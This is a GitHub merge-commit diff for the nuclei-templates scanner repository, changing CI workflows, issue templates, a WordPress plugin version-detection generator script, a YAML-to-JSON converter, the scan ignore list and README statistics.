Merge branch 'main' into CVE-2017-5645

patch-1
Ritik Chaddha 2023-05-24 21:44:34 +05:30 committed by GitHub
commit c9db123f00
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9113 changed files with 286741 additions and 106249 deletions

View File

@ -13,7 +13,7 @@ labels: 'false-negative'
### Template file:
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
<!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
### Command to reproduce:

View File

@ -13,7 +13,7 @@ labels: 'false-positive'
### Template file:
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
<!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
### Command to reproduce:

17
.github/ISSUE_TEMPLATE/new-template.md vendored Normal file
View File

@ -0,0 +1,17 @@
---
name: Template Request
about: 'request for new template to be created.'
labels: 'new-template'
---
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Template for?
<!-- Name the CVE / Vulnerability / Exploit / Misconfiguration / Technology -->
### Details:
<!-- Required information to create a nuclei template such as exploit link / source / reference / vulnerable setup / search query / demo host -->

30
.github/auto_assign.yml vendored Normal file
View File

@ -0,0 +1,30 @@
# Set to true to add reviewers to pull requests
addReviewers: true
# Set to true to add assignees to pull requests
addAssignees: true
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- pussycat0x
- DhiyaneshGeek
- ritikchaddha
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
numberOfReviewers: 1
# A list of assignees, overrides reviewers if set
assignees:
- ritikchaddha
- DhiyaneshGeek
- pussycat0x
# A number of assignees to add to the pull request
# Set to 0 to add all of the assignees.
# Uses numberOfReviewers if unset.
numberOfAssignees: 1
# A list of keywords to be skipped the process that add reviewers if pull requests include it
# skipKeywords:
# - wip

19
.github/dependabot.yml vendored Normal file
View File

@ -0,0 +1,19 @@
# To get started with Dependabot version updates, you'll need to specify which
# package ecosystems to update and where the package manifests are located.
# Please see the documentation for all configuration options:
# https://help.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
version: 2
updates:
# Maintain dependencies for GitHub Actions
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
target-branch: "main"
commit-message:
prefix: "chore"
include: "scope"
labels:
- "Type: Maintenance"

View File

@ -0,0 +1,10 @@
beautifulsoup4==4.11.1
bs4==0.0.1
certifi==2022.9.24
charset-normalizer==2.1.1
idna==3.4
Markdown==3.4.1
requests==2.28.1
soupsieve==2.3.2.post1
termcolor==2.1.1
urllib3==1.26.13

View File

@ -0,0 +1,185 @@
#!/usr/bin/env python3
'''
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
compares the detect version with the payload version.
The generated template also includes the tags top-100 and top-200 allowing filtering.
e.g.
nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
'''
__author__ = "ricardomaia"
from time import sleep
from bs4 import BeautifulSoup
import requests
import re
from markdown import markdown
import os
from termcolor import colored, cprint
# Regex to extract the name of th plugin from the URL
regex = r"https://wordpress.org/plugins/(\w.+)/"
ranking = 1
# Top 200 Wordpress Plugins
for page_number in range(1, 11):
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Accept-Language": "en-US,en;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0",
"Pragma": "no-cache",
}).content
# Parse HTML
soup = BeautifulSoup(html, 'html.parser')
results = soup.find(id="main")
articles = results.find_all("article", class_="plugin-card")
# Setting the top tag
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
# Get each plugin in the page
for article in articles:
full_title = article.find("h3", class_="entry-title").get_text()
regex_remove_quotes = r"[\"`:]"
subst_remove_quotes = "'"
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
link = article.find("a").get("href")
name = re.search(regex, link).group(1)
cprint(f"Title: {title}", "cyan")
cprint(f"Link: {link}", "yellow")
cprint(f"Name: {name} - Ranking: {ranking}", "green")
print(f"Page Number: {page_number}")
print(f"Top Tag: {top_tag}")
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
ranking += 1
sleep(0.2)
# Get the readme.txt file from SVN
readme = requests.get(
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"Host": "plugins.svn.wordpress.org",
"Pragma": "no-cache",
"Upgrade-Insecure-Requests": "1",
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
# Extract the plugin version
try:
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
readme.decode("utf-8")).group(1)
except:
version = "N/A"
# Extract the plugin description
try:
description_markdown = re.search(
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
html = markdown(description_markdown)
full_description = BeautifulSoup(html, 'html.parser').get_text()
regex_max_length = r"(\b.{80}\b)"
subst_max_lenght = "\\g<1>\\n "
description = re.sub(
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
except:
description = "N/A"
print(f"Version: {version}")
print(f"Description: {description}")
# Write the plugin template to file
template = f'''id: wordpress-{name}
info:
name: {title} Detection
author: ricardomaia
severity: info
reference:
- https://wordpress.org/plugins/{name}/
metadata:
plugin_namespace: {name}
wpscan: https://wpscan.com/plugin/{name}
tags: tech,wordpress,wp-plugin,{top_tag}
http:
- method: GET
path:
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
payloads:
last_version: helpers/wordpress/plugins/{name}.txt
extractors:
- type: regex
part: body
internal: true
name: internal_detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
- type: regex
part: body
name: detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
matchers-condition: or
matchers:
- type: dsl
name: "outdated_version"
dsl:
- compare_versions(internal_detected_version, concat("< ", last_version))
- type: regex
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
'''
work_dir = os.getcwd()
print(f"Current working directory: {work_dir}")
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
if not os.path.exists(helper_dir):
os.makedirs(helper_dir)
if not os.path.exists(template_dir):
os.makedirs(template_dir)
helper_path = f"helpers/wordpress/plugins/{name}.txt"
version_file = open(helper_path, "w")
version_file.write(version)
version_file.close()
template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
template_file = open(template_path, "w") # Dev environment
template_file.write(template)
template_file.close()
print("--------------------------------------------")
print("\n")

93
.github/scripts/yaml2json.go vendored Normal file
View File

@ -0,0 +1,93 @@
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
"gopkg.in/yaml.v3"
)
type Classification struct {
CVSSScore string `yaml:"cvss-score,omitempty"`
}
type Info struct {
Name string `yaml:"name"`
Severity string `yaml:"severity"`
Description string `yaml:"description"`
Classification Classification `yaml:"classification,omitempty"`
}
type Data struct {
ID string `yaml:"id"`
Info Info `yaml:"info"`
FilePath string `json:"file_path"`
}
func main() {
if len(os.Args) != 3 {
fmt.Println("Usage: go run main.go <directory> <output_file>")
os.Exit(1)
}
directory := os.Args[1]
outputFile := os.Args[2]
var data []Data
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
yamlFile, err := ioutil.ReadFile(path)
if err != nil {
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
return err
}
var d Data
err = yaml.Unmarshal(yamlFile, &d)
if err != nil {
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
return err
}
if d.Info.Classification.CVSSScore == "" {
d.Info.Classification.CVSSScore = "N/A"
}
if d.Info.Classification == (Classification{}) {
d.Info.Classification.CVSSScore = "N/A"
}
fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
d.FilePath = fpath
data = append(data, d)
}
return nil
})
if err != nil {
fmt.Printf("Error reading directory: %v\n", err)
os.Exit(1)
}
var jsonData []byte
for _, d := range data {
temp, err := json.Marshal(d)
if err != nil {
fmt.Printf("Error marshalling JSON: %v\n", err)
os.Exit(1)
}
jsonData = append(jsonData, temp...)
jsonData = append(jsonData, byte('\n'))
}
err = ioutil.WriteFile(outputFile, jsonData, 0644)
if err != nil {
fmt.Printf("Error writing JSON data to file: %v\n", err)
os.Exit(1)
}
fmt.Println("JSON data written to", outputFile)
}

22
.github/workflows/cache-purge.yml vendored Normal file
View File

@ -0,0 +1,22 @@
name: 🗑️ Cache Purge
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
steps:
# Wait for 5 minutes
- name: Wait for 2 minutes
run: sleep 120
- name: Purge cache
uses: jakejarvis/cloudflare-purge-action@master
env:
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
# PURGE_URLS: '["https://version-check.nuclei.sh/versions"]'

View File

@ -3,43 +3,43 @@ name: ✍🏻 CVE Annotate
on:
push:
branches:
- master
- main
paths:
- '**/cves/**.yaml'
workflow_dispatch:
jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v3
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/setup-go@v2
- name: Set up Go
uses: actions/setup-go@v4
with:
go-version: 1.17
go-version: 1.19
- name: cve-annotate install
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
cve-annotate -i . -d .
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.cve-annotate.outputs.changes > 0
if: steps.cve-annotate.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add cves
git add .
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
- name: Push changes
if: steps.cve-annotate.outputs.changes > 0
if: steps.cve-annotate.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}

40
.github/workflows/cve2json.yml vendored Normal file
View File

@ -0,0 +1,40 @@
name: Generate JSON Metadata of CVE Templates
on:
push:
branches:
- main
paths:
- '**/cves/'
workflow_dispatch: # allows manual triggering of the workflow
jobs:
cve2json:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- name: Set up Go
uses: actions/setup-go@v4
with:
go-version: 1.19
check-latest: true
- name: Run yaml2json.go to generate cves.json
run: |
go env -w GO111MODULE=off
go get gopkg.in/yaml.v3
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
- name: Commit files
run: |
git pull
git add cves.json cves.json-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}

39
.github/workflows/new-templates.yml vendored Normal file
View File

@ -0,0 +1,39 @@
name: 🥳 New Template List
on:
push:
branches:
- main
paths:
- '**.yaml'
workflow_dispatch:
jobs:
templates:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@master
with:
token: ${{ secrets.GITHUB_TOKEN }}
persist-credentials: false
fetch-depth: 0
- name: Generate new template list
id: new-additions
run: |
git pull
git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions
- name: Commit files
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add .new-additions -f
git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

View File

@ -22,7 +22,7 @@ jobs:
fetch-depth: 0
- name: Set up Python
uses: actions/setup-python@v2
uses: actions/setup-python@v4
with:
python-version: "3.8"
@ -30,17 +30,17 @@ jobs:
id: readme-update
run: |
python .github/scripts/update-readme.py
echo "::set-output name=changes::$(git status -s | wc -l)"
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.readme-update.outputs.changes > 0
if: steps.readme-update.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto README Update [$(date)] :robot:" -a
- name: Push changes
if: steps.readme-update.outputs.changes > 0
if: steps.readme-update.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}

View File

@ -1,6 +1,10 @@
name: ❄️ YAML Lint
on: [push, pull_request]
on:
pull_request:
paths:
- '**.yaml'
workflow_dispatch:
jobs:
build:
@ -8,7 +12,7 @@ jobs:
steps:
- uses: actions/checkout@v2
- name: Yamllint
uses: karancode/yamllint-github-action@master
uses: karancode/yamllint-github-action@v2.1.1
with:
yamllint_config_filepath: .yamllint
yamllint_strict: false

45
.github/workflows/template-checksum.yml vendored Normal file
View File

@ -0,0 +1,45 @@
name: 📝 Template Checksum
on:
push:
branches:
- main
paths:
- '**.yaml'
workflow_dispatch: # allows manual triggering of the workflow
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Go
uses: actions/setup-go@v4
with:
go-version: 1.19
- name: install checksum generator
run: |
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
- name: generate checksum
id: checksum
run: |
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.checksum.outputs.CHANGES > 0
run: |
git add templates-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}

View File

@ -0,0 +1,32 @@
name: 📑 Template-DB Indexer
on:
push:
branches:
- main
paths:
- '**.yaml'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- name: Set up Go
uses: actions/setup-go@v4
with:
go-version: 1.19
- name: Installing Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates

View File

@ -1,37 +1,29 @@
name: 🛠 Template Validate
on: [ push, pull_request ]
on:
pull_request:
paths:
- '**.yaml'
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- name: Get latest Nuclei release version
id: nuclei-latest
uses: actions/github-script@v5
- uses: actions/checkout@v3
with:
result-encoding: string
script: |
const release = await github.rest.repos.getLatestRelease({
owner: 'projectdiscovery',
repo: 'nuclei',
});
fetch-depth: 0
return release.data.name
- name: Set up Go
uses: actions/setup-go@v4
with:
go-version: 1.19
- name: Setup Nuclei
if: steps.nuclei-latest.outputs.result != ''
env:
VERSION: ${{ steps.nuclei-latest.outputs.result }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin
working-directory: /tmp
- name: nuclei install
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
nuclei -validate -t .
nuclei -validate -w ./workflows
nuclei -duc -validate
nuclei -duc -validate -w ./workflows

View File

@ -10,10 +10,14 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
- uses: actions/checkout@v3
with:
go-version: 1.17
fetch-depth: 0
- name: Set up Go
uses: actions/setup-go@v4
with:
go-version: 1.19
- name: Installing Template Stats
run: |
@ -37,10 +41,10 @@ jobs:
- name: Get statistical changes
id: stats
run: echo "::set-output name=changes::$(git status -s | wc -l)"
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.stats.outputs.changes > 0
if: steps.stats.outputs.CHANGES > 0
run: |
git add TEMPLATES-STATS.*
git add TOP-10.md
@ -52,4 +56,3 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master

View File

@ -0,0 +1,45 @@
name: ✨ WordPress Plugins - Update
on:
schedule:
- cron: "0 4 * * *" # every day at 4am UTC
workflow_dispatch:
jobs:
Update:
runs-on: ubuntu-latest
steps:
- name: Check out repository code
uses: actions/checkout@v3
with:
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
- name: Install Python3
uses: actions/setup-python@v4
with:
python-version: "3.10"
- run: |
python -m pip install --upgrade pip
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
- name: Update Templates
id: update-templates
run: |
python3 .github/scripts/wordpress-plugins-update.py
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.update-templates.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add --all
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
- name: Push changes
if: steps.update-templates.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

25
.new-additions Normal file
View File

@ -0,0 +1,25 @@
http/cves/2021/CVE-2021-37304.yaml
http/cves/2021/CVE-2021-37305.yaml
http/cves/2022/CVE-2022-22733.yaml
http/cves/2022/CVE-2022-2733.yaml
http/cves/2023/CVE-2023-1434.yaml
http/cves/2023/CVE-2023-25717.yaml
http/cves/2023/CVE-2023-2780.yaml
http/cves/2023/CVE-2023-29923.yaml
http/exposed-panels/interactsoftware-interact.yaml
http/exposed-panels/odoo-panel.yaml
http/exposed-panels/repetier-server-panel.yaml
http/exposed-panels/shardingsphere-panel.yaml
http/exposures/apis/jeecg-boot-swagger.yaml
http/exposures/configs/blazor-boot.yaml
http/exposures/configs/config-properties.yaml
http/misconfiguration/sitecore-lfi.yaml
http/misconfiguration/teslamate-unauth-access.yaml
http/vulnerabilities/avtech/avtech-auth-bypass.yaml
http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml
http/vulnerabilities/avtech/avtech-unauth-file-download.yaml
http/vulnerabilities/avtech/avtech-verification-bypass.yaml
http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml
http/vulnerabilities/zyxel/unauth-ztp-ping.yaml
network/cves/2016/CVE-2016-3510.yaml
network/cves/2020/CVE-2020-11981.yaml

View File

@ -3,6 +3,11 @@
#
# This is default list of tags and files to excluded from default nuclei scan.
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
#
# ============ DO NOT EDIT ============
# Automatically updated by nuclei on execution from nuclei-templates
# User changes should be in nuclei config file
# ============ DO NOT EDIT ============
# tags is a list of tags to ignore execution for
# unless asked for by the user.
@ -10,7 +15,23 @@
tags:
- "fuzz"
- "dos"
- "misc"
# The following templates have been excluded because they have weak matchers and may generate FP results.
# Please feel free to create PR if you can update the templates with strict matchers.
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- http/cves/2006/CVE-2006-1681.yaml
- http/cves/2007/CVE-2007-5728.yaml
- http/cves/2014/CVE-2014-9608.yaml
- http/cves/2018/CVE-2018-5233.yaml
- http/cves/2019/CVE-2019-14696.yaml
- http/cves/2020/CVE-2020-11930.yaml
- http/cves/2020/CVE-2020-19295.yaml
- http/cves/2020/CVE-2020-2036.yaml
- http/cves/2020/CVE-2020-28351.yaml
- http/cves/2021/CVE-2021-35265.yaml
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
- http/vulnerabilities/other/nginx-module-vts-xss.yaml

View File

@ -3,7 +3,9 @@ extends: default
ignore: |
.pre-commit-config.yml
.github/workflows/*.yml
.github/
.git/
*.yml
rules:
document-start: disable
@ -15,3 +17,5 @@ rules:
require-starting-space: true
ignore-shebangs: true
min-spaces-from-content: 1
empty-lines:
max: 5

View File

@ -24,5 +24,5 @@ I've validated this template locally?
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

View File

@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 945 | daffainfo | 434 | cves | 951 | info | 979 | http | 2628 |
| lfi | 399 | dhiyaneshdk | 360 | vulnerabilities | 376 | high | 727 | file | 57 |
| panel | 377 | pikpikcu | 293 | exposed-panels | 375 | medium | 536 | network | 48 |
| xss | 294 | pdteam | 232 | technologies | 213 | critical | 339 | dns | 12 |
| wordpress | 277 | geeknik | 173 | exposures | 197 | low | 172 | | |
| exposure | 260 | dwisiswant0 | 159 | misconfiguration | 170 | | | | |
| rce | 247 | pussycat0x | 98 | token-spray | 146 | | | | |
| tech | 223 | gy741 | 93 | workflows | 86 | | | | |
| cve2021 | 207 | 0x_akoko | 91 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
**201 directories, 2879 files**.
**395 directories, 6435 files**.
</td>
</tr>

96
README_KR.md Normal file
View File

@ -0,0 +1,96 @@
<h1 align="center">
Nuclei 템플릿
</h1>
<h4 align="center">커뮤니티에서 엄선한, 애플리케이션 보안 취약점을 찾기 위한 Nuclei 엔진용 템플릿 목록</h4>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
<p align="center">
<a href="https://nuclei.projectdiscovery.io/templating-guide/">가이드 문서</a>
<a href="#-contributions">기여</a>
<a href="#-discussion">논의</a>
<a href="#-community">커뮤니티</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a>
<a href="https://discord.gg/projectdiscovery">디스코드</a>
</p>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a>
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a>
</p>
----
템플릿은 실제 스캐닝 엔진을 동작하게 하는 [nuclei scanner](https://github.com/projectdiscovery/nuclei)의 핵심입니다.
이 저장소는 우리 팀에서 제공하거나, 커뮤니티에서 기여한 다양한 템플릿들을 저장하고 보관합니다.
템플릿 목록을 증가시키기 위해서 **pull requests** 나 [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) 를 통해 기여해주시기를 부탁드립니다.
## Nuclei 템플릿 개요
고유 태그, 작성자, 디렉토리, 심각도, 템플릿 종류에 대한 통계를 포함하고 있는 nuclei 템플릿의 개요입니다. 아래 표는 각 지표의 상위 10개 항목을 나타내고 있습니다. 더 자세한 정보는 [이곳](TEMPLATES-STATS.md)에서 확인 가능하고, [JSON](TEMPLATES-STATS.json) 형식으로도 확인 가능합니다.
<table>
<tr>
<td>
## Nuclei 템플릿 통계 Top 10
| 태그 | 개수 | 작성자 | 개수 | 디렉토리 | 개수 | 심각도 | 개수 | 종류 | 개수 |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 |
| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 |
| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 |
| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 |
| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | |
| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | |
| rce | 319 | princechaddha | 149 | workflows | 187 | | | | |
| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | |
| tech | 286 | gy741 | 126 | file | 76 | | | | |
**286개 디렉토리, 4012개 파일**.
</td>
</tr>
</table>
📖 문서
-----
새 템플릿이나 사용자 정의 템플릿을 빌드하기 위한 자세한 문서는 https://nuclei.projectdiscovery.io 에서 확인할 수 있습니다. 작업 방식의 이해를 돕기 위한 템플릿들도 있습니다.
💪 기여
-----
Nuclei 템플릿은 커뮤니티의 기여로 동작합니다.
[템플릿 기여](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [기능 요청](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [버그 제보](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)는 언제든지 환영합니다.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 논의
-----
같이 이야기하고 싶은 질문, 의문 혹은 아이디어가 있으신가요?
[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) 에서 자유롭게 시작할 수 있습니다.
👨‍💻 커뮤니티
-----
프로젝트 관리자와 직접 논의하고 보안과 자동화 관련 사항을 다른 사람과 공유하기 위해 [Discord Community](https://discord.gg/projectdiscovery) 에 참여하는 것을 환영합니다. 추가로 Nuclei 에 대한 모든 정보를 업데이트 하기 위해 [트위터](https://twitter.com/pdnuclei) 팔로우를 할 수 있습니다.
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
여러분의 기여와 커뮤니티의 활성화를 위한 노력에 다시한번 감사드립니다.
:heart:

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
